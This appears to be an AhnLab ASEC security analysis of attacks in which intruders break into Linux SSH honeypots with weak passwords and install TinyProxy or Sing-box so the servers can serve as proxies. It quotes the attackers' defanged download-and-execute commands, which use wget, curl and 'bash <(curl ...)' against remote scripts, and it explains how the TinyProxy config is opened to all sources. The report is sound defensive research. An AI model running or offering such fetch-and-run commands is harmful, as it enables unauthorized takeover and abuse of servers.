Analysis of Attacks Targeting Linux SSH Servers for Proxy Installation
AhnLab SEcurity intelligence Center (ASEC) monitors attacks targeting Linux servers that are inappropriately managed using honeypots. One of the representative honeypots is the SSH service that uses weak credentials, which is targeted by a large number of DDoS and coinminer attackers.
ASEC has identified cases where Linux servers were attacked to install proxies. In each case, TinyProxy or Sing-box was installed. No other attack logs were found except for the installation of TinyProxy or Sing-box. It appears that the attackers aim to use the infected systems as proxy nodes.
1. Case of Installing TinyProxy
The attacker attempted to log in to the honeypot Linux server and, upon successful login, downloaded and executed a Bash malware using the following command.
| # (wget -O s.sh hxxps://0x0[.]st/8VDs.sh || curl -o s.sh hxxps://0x0[.]st/8VDs.sh) && chmod +x s.sh && sh s.sh |
Figure 1. Malicious Bash Script with Polish Comments
The Bash script first installs TinyProxy using apt, yum, or dnf according to the OS environment. It manipulates the configuration file to allow external connections and maintains persistence.
Figure 2. Setting and Preserving TinyProxy
Specifically, delete the access control rules starting with Allow and Deny in the TinyProxy configuration file, “/etc/tinyproxy/tinyproxy.conf” or “/etc/tinyproxy.conf,” and add the rule “Allow 0.0.0.0/0.” This rule allows unrestricted access from external sources. Consequently, attackers can access port 8888, which TinyProxy service uses, and exploit the infected system as a proxy.
Figure 3. Commented and Inserted TinyProxy Configuration
2. Sing-box Installation Case
The following is an attack case that installs a proxy tool named Sing-box. The attacker installed Sing-box using the following command.
| # ls # whoami # sudo su # apt # bash # sudo apt # lscpu # free -h # clear # cat /etc/os-release # sudo apt-get update # sudo -s # head -n 1 /etc/issue # uname -a # which curl # which python3 # ls /usr/bin | grep python # bash <(curl -Ls hxxps://raw.githubusercontent[.]com/eooce/sing-box/main/sing-box.sh) # bash 1 # bah # curl # curl -fsSL hxxps://raw.githubusercontent[.]com/eooce/ssh_tool/main/ssh_tool.sh -o ssh_tool.sh && chmod +x ssh_tool.sh && ./ssh_tool.sh # curl –help # curl -L hxxps://raw.githubusercontent[.]com/eooce/ssh_tool/main/ssh_tool.sh -o ssh_tool.sh # which wget # wget hxxps://raw.githubusercontent[.]com/eooce/ssh_tool/main/ssh_tool.sh -O ssh_tool.sh |
Sing-box is a tool to install a multipurpose proxy that supports the vmess-argo, vless-reality, Hysteria2, and TUICv5 protocols. According to GitHub, the open source can be installed to unblock ChatGPT and Netflix. Note that the author seems to have created Sing-box for the purpose of bypassing the block in countries where such services are not available. In other words, if Sing-box is installed on a Virtual Private Server (VPS) located overseas and used as a proxy, the services can be accessed using the four bypass protocols supported by Sing-box. However, in this case, the attacker gained unauthorized access to others’ systems to install Sing-box, and it appears that the attacker intended to use it for illegal or profit-making purposes.
Figure 4. Sing-box GitHub Page
3. Conclusion
Recently, there have been confirmed cases of proxies being installed on poorly managed Linux servers. A notable characteristic is the abuse of legitimate tools—such as TinyProxy or open-source software like Sing-box—rather than using traditional proxy malware. Attackers can use the infected system as a proxy to conceal themselves in another attack case or sell access rights to the proxy node for criminal profit.
Accordingly, administrators must use passwords that are difficult to guess and change them periodically to protect Linux servers from brute-force and pre-attack. Also, they need to patch to the latest version to prevent vulnerability attacks and use security products like firewalls to control access from attackers on servers that are exposed to the public. Lastly, they should update V3 to the latest version to prevent malware infections in advance.
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
